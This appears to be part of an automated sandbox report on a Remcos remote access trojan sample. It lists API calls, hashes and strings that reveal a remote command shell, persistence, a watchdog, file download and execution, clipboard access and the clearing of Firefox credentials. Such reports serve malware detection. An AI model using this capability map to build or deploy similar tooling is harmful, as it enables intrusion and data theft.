                                      • RegSetValueExA.KERNEL32(?,02B674B8,00000000,?,00000000,00000000,02B752F0,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137A6
                                      • RegCloseKey.KERNEL32(?,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: pth_unenc
                                      • API String ID: 1818849710-4028850238
                                      • Opcode ID: dbd3f6a06002d8c22723201101a8ffc6a5fb1d0bf1dab8fd33f07338c3fbbdc6
                                      • Instruction ID: 8af4487b6b87f8dbf81c67d87824ea47c665cd6a906756c5c029b7e2d3504e83
                                      • Opcode Fuzzy Hash: dbd3f6a06002d8c22723201101a8ffc6a5fb1d0bf1dab8fd33f07338c3fbbdc6
                                      • Instruction Fuzzy Hash: 4BF06D72840218FBCB01AFA0EC85EEE3B6DEF04790F148995FD09AA050EB319E14DB90

                                      Control-flow Graph

                                      APIs
                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • WaitForSingleObject.KERNEL32(?,00000000,02B0547D,?,?,00000004,?,?,00000004,?,02B74EF8,?), ref: 02B04B47
                                      • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,02B74EF8,?,?,?,?,?,?,02B0547D), ref: 02B04B75
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventObjectSingleWaitsend
                                      • String ID:
                                      • API String ID: 3963590051-0
                                      • Opcode ID: a1ba01c36c396815851a8b22699fff45c7793ac2059c3f801d502867bd85c999
                                      • Instruction ID: 075ac1af293d634799f55a8b23b83b6c2310230e7adbb9ba12d071a27ebd2730
                                      • Opcode Fuzzy Hash: a1ba01c36c396815851a8b22699fff45c7793ac2059c3f801d502867bd85c999
                                      • Instruction Fuzzy Hash: A7214572900119ABCB16ABA4DCC4DEE7B3DBF18350B044555E516A31D0EF35AA18CBA0

                                      Control-flow Graph

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02B135CA
                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02B135E7
                                      • RegCloseKey.KERNEL32(?), ref: 02B135F2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 87b0e080284e9f31ead4a833bba09f0941481dd910d1752fc3de0ca9f2573d1a
                                      • Instruction ID: e6854096869305dbf7438823d01b382bdc6a06190184ad88281bea904beffff9
                                      • Opcode Fuzzy Hash: 87b0e080284e9f31ead4a833bba09f0941481dd910d1752fc3de0ca9f2573d1a
                                      • Instruction Fuzzy Hash: 6C01A276900228BBCB209B91DC49EEE7FBDDF84250F0004E5BA09E3200EA348A15DBE0

                                      Control-flow Graph

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,02B752F0), ref: 02B13714
                                      • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02B1372D
                                      • RegCloseKey.KERNEL32(00000000), ref: 02B13738
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 2e814837b038403472347f2121085bdb75dd1a379a4f5e91bd7714f601bc6f64
                                      • Instruction ID: aea2a08e05c2c1098f191f3179fd3357a737fe272d8240bb36d22d0fc0d8fe7f
                                      • Opcode Fuzzy Hash: 2e814837b038403472347f2121085bdb75dd1a379a4f5e91bd7714f601bc6f64
                                      • Instruction Fuzzy Hash: 9801FBB5840229FBDF216FA1DC44EEA7F79EF05750F004594BE0866150E73189B5DBE0

                                      Control-flow Graph

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02B13569
                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,02B752F0), ref: 02B13587
                                      • RegCloseKey.KERNEL32(?), ref: 02B13592
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: cfca8d0086eb8f709042a5cc56637ea5522400c093d35ee65fed8c495a490bfe
                                      • Instruction ID: 0da7fab96708ac1face2ee8c2502d90f3d2a5a3416028e0bf8ff535e200eef64
                                      • Opcode Fuzzy Hash: cfca8d0086eb8f709042a5cc56637ea5522400c093d35ee65fed8c495a490bfe
                                      • Instruction Fuzzy Hash: 4CF01D76D40218FFDF109FA0DC05FEE7BBCEF04B50F144495BA05EA141E2355A14AB90
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,02B0C19C,02B66C48), ref: 02B13516
                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,02B0C19C,02B66C48), ref: 02B1352A
                                      • RegCloseKey.KERNEL32(?,?,?,02B0C19C,02B66C48), ref: 02B13535
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 99c98c2d07f67832fd5a17ab48c67eaaf1875fc738c546ffd100c65fd0b61406
                                      • Instruction ID: a056a7a9f9933699bc3c3bc67f9843b2b9db082840c3772babeeda1eb6f947f1
                                      • Opcode Fuzzy Hash: 99c98c2d07f67832fd5a17ab48c67eaaf1875fc738c546ffd100c65fd0b61406
                                      • Instruction Fuzzy Hash: E1E06531841238FBDF205BA29C0DEEB7FACDF06AE0B040584BD0DA6101E2254E10D6E0
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,02B660A4), ref: 02B13885
                                      • RegSetValueExA.KERNEL32(02B660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138A0
                                      • RegCloseKey.KERNEL32(02B660A4,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138AB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID:
                                      • API String ID: 1818849710-0
                                      • Opcode ID: a54b69433ea0449045147852a5f90e78039288ff0b640f553ee88ce6d5fa9f10
                                      • Instruction ID: 342bb628386ffbce47f33527fe81237cc2ee28ec96a2cc298f36fefe86acf964
                                      • Opcode Fuzzy Hash: a54b69433ea0449045147852a5f90e78039288ff0b640f553ee88ce6d5fa9f10
                                      • Instruction Fuzzy Hash: 80E03072940318FBEF115F909C05FEA7B6CDF04690F044594BF09AA140D3359A1497D0
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 02B1B7CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID: @
                                      • API String ID: 1890195054-2766056989
                                      • Opcode ID: bbcecb299d33646e905c6b94cb765be3f713ce2977c7e55a176d99520e595df0
                                      • Instruction ID: fa47c3e7be16dfeff8431e9690db95ebff44d3610c6379f1c92ccd333864063e
                                      • Opcode Fuzzy Hash: bbcecb299d33646e905c6b94cb765be3f713ce2977c7e55a176d99520e595df0
                                      • Instruction Fuzzy Hash: 4AD017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8148B84
                                      APIs
                                      • socket.WS2_32(?,00000001,00000006), ref: 02B04852
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,02B0530B,?,?,00000000,00000000,?,?,00000000,02B05208,?,00000000), ref: 02B0488E
                                        • Part of subcall function 02B0489E: WSAStartup.WS2_32(00000202,00000000), ref: 02B048B3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventStartupsocket
                                      • String ID:
                                      • API String ID: 1953588214-0
                                      • Opcode ID: 034ca545537b63cb2c955060ab9b9166f1cc11f944dff2a491818d99c370c58a
                                      • Instruction ID: afd30fe76d2aa122415bfb3ddbe737621285e5c42f4cb3b0451ab81cb2d32b30
                                      • Opcode Fuzzy Hash: 034ca545537b63cb2c955060ab9b9166f1cc11f944dff2a491818d99c370c58a
                                      • Instruction Fuzzy Hash: 2601BC70848BD08EE7358F38A4853867FE0AB05304F044D9EF5D687B80D3B1A445CF14
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction ID: 5a1034231f6e103de59520e5a86746646ee13c4770a04973c563891c300cc604
                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction Fuzzy Hash: 1EF0E2B06252016ADB1E8B7CCCA0B2A3A969B84325F58CBEDF01EC60D0CB30C890CB04
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 02B1BAB8
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 02B1BACB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$ForegroundText
                                      • String ID:
                                      • API String ID: 29597999-0
                                      • Opcode ID: 9dde3d0392ee3c84791d518730962e601b313450ff0feac9d11c5117441fa7d1
                                      • Instruction ID: 045779486e98685dcdad0f274429eaa14c0ca5a26629fe951a7b0507ab6a2560
                                      • Opcode Fuzzy Hash: 9dde3d0392ee3c84791d518730962e601b313450ff0feac9d11c5117441fa7d1
                                      • Instruction Fuzzy Hash: C1E0D871E40338A7E720A7A49C8DFE57B7CEB04740F0000D9B618D71C1EAB0A914CBE0
                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,02B72ADC,02B750E4,00000000,02B15188,00000000,00000001), ref: 02B14F0B
                                      • WSASetLastError.WS2_32(00000000), ref: 02B14F10
                                        • Part of subcall function 02B14D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02B14DD5
                                        • Part of subcall function 02B14D86: LoadLibraryA.KERNEL32(?), ref: 02B14E17
                                        • Part of subcall function 02B14D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E37
                                        • Part of subcall function 02B14D86: FreeLibrary.KERNEL32(00000000), ref: 02B14E3E
                                        • Part of subcall function 02B14D86: LoadLibraryA.KERNEL32(?), ref: 02B14E76
                                        • Part of subcall function 02B14D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E88
                                        • Part of subcall function 02B14D86: FreeLibrary.KERNEL32(00000000), ref: 02B14E8F
                                        • Part of subcall function 02B14D86: GetProcAddress.KERNEL32(00000000,?), ref: 02B14E9E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                      • String ID:
                                      • API String ID: 1170566393-0
                                      • Opcode ID: 6daa216aaf0d6b9b86ac71faf20bf2437050945afe7e5649a0575edd51a08f70
                                      • Instruction ID: 480253779a1c4ff2966255ee8aecd150b5484351121af2dbe8150b3a1ef19a2e
                                      • Opcode Fuzzy Hash: 6daa216aaf0d6b9b86ac71faf20bf2437050945afe7e5649a0575edd51a08f70
                                      • Instruction Fuzzy Hash: 61D01732A415216BE320A66DAC01BBAABADDB977A0B550466F914D3200D6908C5186E0
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,02B0EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02B660BC,00000003,00000000), ref: 02B0D078
                                      • GetLastError.KERNEL32 ref: 02B0D083
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastMutex
                                      • String ID:
                                      • API String ID: 1925916568-0
                                      • Opcode ID: afcccd6f62e90587e5cece9b79c382b341491d0d85c27700162bf47136729bb4
                                      • Instruction ID: a6b2cfd304605848f4bdf64215d935b8e88e9bde0104fcb5ae732a29b1673a7d
                                      • Opcode Fuzzy Hash: afcccd6f62e90587e5cece9b79c382b341491d0d85c27700162bf47136729bb4
                                      • Instruction Fuzzy Hash: EBD012B1E95710DBDB181774D49975939959744741F800859B907CE9D0CA6544A08A11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID:
                                      • API String ID: 176396367-0
                                      • Opcode ID: 3f8191f89fcd14349dcf41c962c7290a2698fb3a064ce1239c486a554687c74e
                                      • Instruction ID: 1f3b234ec08113fff9c9415f8877f44306a6055bafb73ae6e66749d0fd2c1839
                                      • Opcode Fuzzy Hash: 3f8191f89fcd14349dcf41c962c7290a2698fb3a064ce1239c486a554687c74e
                                      • Instruction Fuzzy Hash: 3A1193319002059BCB1AEF68E8909EF7FBAAF14310B000099E816532E0EF74AD59CF50
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 3fa9458fe9cb10b1570a1cf6a6ca0cd4aa27752fe8b7673e68b5d6464a6e8a3d
                                      • Instruction ID: 2d46d7b65332b4880006ffa6fd5d57cba6b0904d0a7ca6cf2723d1a89edfcb40
                                      • Opcode Fuzzy Hash: 3fa9458fe9cb10b1570a1cf6a6ca0cd4aa27752fe8b7673e68b5d6464a6e8a3d
                                      • Instruction Fuzzy Hash: 6BE06D31D4062567EB2226699C84B5B775EDF433A2F4562A1ED5696082DF20D880A6E0
                                      APIs
                                      • WSAStartup.WS2_32(00000202,00000000), ref: 02B048B3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: e1fea8fd03a4b8eb96f9675cb39f35efa17a4955f64088afecdb749686fb23a3
                                      • Instruction ID: ba9e3d3ee934738c5c726242e54b1e82c3e5d505584d1474597966ce5148d5b3
                                      • Opcode Fuzzy Hash: e1fea8fd03a4b8eb96f9675cb39f35efa17a4955f64088afecdb749686fb23a3
                                      • Instruction Fuzzy Hash: 4AD0123299871C8EF620AAB4AC0F9E4776CC312655F040BAA6CB5C35C2E644272DC2F7
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 02B07CB9
                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 02B07D87
                                      • DeleteFileW.KERNEL32(00000000), ref: 02B07DA9
                                        • Part of subcall function 02B1C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C2EC
                                        • Part of subcall function 02B1C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C31C
                                        • Part of subcall function 02B1C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C371
                                        • Part of subcall function 02B1C291: FindClose.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D2
                                        • Part of subcall function 02B1C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D9
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                        • Part of subcall function 02B04AA1: WaitForSingleObject.KERNEL32(?,00000000,02B0547D,?,?,00000004,?,?,00000004,?,02B74EF8,?), ref: 02B04B47
                                        • Part of subcall function 02B04AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,02B74EF8,?,?,?,?,?,?,02B0547D), ref: 02B04B75
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02B08197
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 02B08278
                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 02B084C4
                                      • DeleteFileA.KERNEL32(?), ref: 02B08652
                                        • Part of subcall function 02B0880C: __EH_prolog.LIBCMT ref: 02B08811
                                        • Part of subcall function 02B0880C: FindFirstFileW.KERNEL32(00000000,?,02B66608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088CA
                                        • Part of subcall function 02B0880C: __CxxThrowException@8.LIBVCRUNTIME ref: 02B088F2
                                        • Part of subcall function 02B0880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088FF
                                      • Sleep.KERNEL32(000007D0), ref: 02B086F8
                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 02B0873A
                                        • Part of subcall function 02B1C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02B1CAD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                      • API String ID: 1067849700-1507758755
                                      • Opcode ID: 69d20d77af24f481a01b134bf5a328dd807ea7a46eb5098cffffd82f09afb4cc
                                      • Instruction ID: 5af2af81d95d7f0792484b3011c209adc0ef54b4a3c9522b5c0311f61c7d2e5e
                                      • Opcode Fuzzy Hash: 69d20d77af24f481a01b134bf5a328dd807ea7a46eb5098cffffd82f09afb4cc
                                      • Instruction Fuzzy Hash: 49428471A143006BD61AFB78C8D5DAE7FAAAF91340F8009DCE546571D4EF649A08CF93
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02B056E6
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • __Init_thread_footer.LIBCMT ref: 02B05723
                                      • CreatePipe.KERNEL32(02B76CCC,02B76CB4,02B76BD8,00000000,02B660BC,00000000), ref: 02B057B6
                                      • CreatePipe.KERNEL32(02B76CB8,02B76CD4,02B76BD8,00000000), ref: 02B057CC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02B76BE8,02B76CBC), ref: 02B0583F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 02B05897
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02B058BC
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02B058E9
                                        • Part of subcall function 02B34770: __onexit.LIBCMT ref: 02B34776
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,02B74F90,02B660C0,00000062,02B660A4), ref: 02B059E4
                                      • Sleep.KERNEL32(00000064,00000062,02B660A4), ref: 02B059FE
                                      • TerminateProcess.KERNEL32(00000000), ref: 02B05A17
                                      • CloseHandle.KERNEL32 ref: 02B05A23
                                      • CloseHandle.KERNEL32 ref: 02B05A2B
                                      • CloseHandle.KERNEL32 ref: 02B05A3D
                                      • CloseHandle.KERNEL32 ref: 02B05A45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: SystemDrive$cmd.exe
                                      • API String ID: 2994406822-3633465311
                                      • Opcode ID: e272dd41ab09e0e85da2d0d6c71370960aec44e55da7b4387cf19bc616482b11
                                      • Instruction ID: dc683c23508a5138901edde51f445b8689bd47dd53ea069160c0f81bc91441a0
                                      • Opcode Fuzzy Hash: e272dd41ab09e0e85da2d0d6c71370960aec44e55da7b4387cf19bc616482b11
                                      • Instruction Fuzzy Hash: 5A91C271A84604AFE716AB35ACC5A2E3FAEEB40380F4008ADF956976D0DF255C588F61
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 02B12106
                                        • Part of subcall function 02B13877: RegCreateKeyA.ADVAPI32(80000001,00000000,02B660A4), ref: 02B13885
                                        • Part of subcall function 02B13877: RegSetValueExA.KERNEL32(02B660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138A0
                                        • Part of subcall function 02B13877: RegCloseKey.KERNEL32(02B660A4,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138AB
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02B12146
                                      • CloseHandle.KERNEL32(00000000), ref: 02B12155
                                      • CreateThread.KERNEL32(00000000,00000000,02B127EE,00000000,00000000,00000000), ref: 02B121AB
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02B1241A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                      • API String ID: 3018269243-13974260
                                      • Opcode ID: 588940b4fb966372af112db6a168420f83a8d37f77573964ab9d7f1fb9a2566a
                                      • Instruction ID: 4fa45891682b674993ab92727cb88873bdf9c7c3f701e619f35703b0cc784af0
                                      • Opcode Fuzzy Hash: 588940b4fb966372af112db6a168420f83a8d37f77573964ab9d7f1fb9a2566a
                                      • Instruction Fuzzy Hash: AB71A5315143105BE61AFB74DC9A97E7BAAAF90340F8009EDB987570E0FF649908CE92
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02B0BBAF
                                      • FindClose.KERNEL32(00000000), ref: 02B0BBC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02B0BCEC
                                      • FindClose.KERNEL32(00000000), ref: 02B0BD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: a668be54d20d43888e605f6142a606f49d247fab18c1ee089698fa8b138691da
                                      • Instruction ID: ec439c2ab999ef42377f86d05d144fbf4eb9d396bcbf00e2563963bffe8c6850
                                      • Opcode Fuzzy Hash: a668be54d20d43888e605f6142a606f49d247fab18c1ee089698fa8b138691da
                                      • Instruction Fuzzy Hash: 265153319102199AEB1AF7B4DCD9EFD7F3AAF10340F4005D9E41AA61D0EF345A99CE91
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02B0BDAF
                                      • FindClose.KERNEL32(00000000), ref: 02B0BDC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02B0BE89
                                      • FindClose.KERNEL32(00000000), ref: 02B0BEAF
                                      • FindClose.KERNEL32(00000000), ref: 02B0BED0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      • Opcode ID: 781602e1c1775ab672992b9331f2db8ebf0fd858ed68fefbea5984625d0a0709
                                      • Instruction ID: 93de223d41fbec0cd27eaca13243be2ff43de8b5d96313df4a31f3016cad0b06
                                      • Opcode Fuzzy Hash: 781602e1c1775ab672992b9331f2db8ebf0fd858ed68fefbea5984625d0a0709
                                      • Instruction Fuzzy Hash: 554190319402199AEB1AF7B4DC99DFDBB6AEF11340F4005D9E40AA70D0EF255A8ACE91
                                      APIs
                                      • OpenClipboard.USER32 ref: 02B168C2
                                      • EmptyClipboard.USER32 ref: 02B168D0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02B168F0
                                      • GlobalLock.KERNEL32(00000000), ref: 02B168F9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02B1692F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 02B16938
                                      • CloseClipboard.USER32 ref: 02B16955
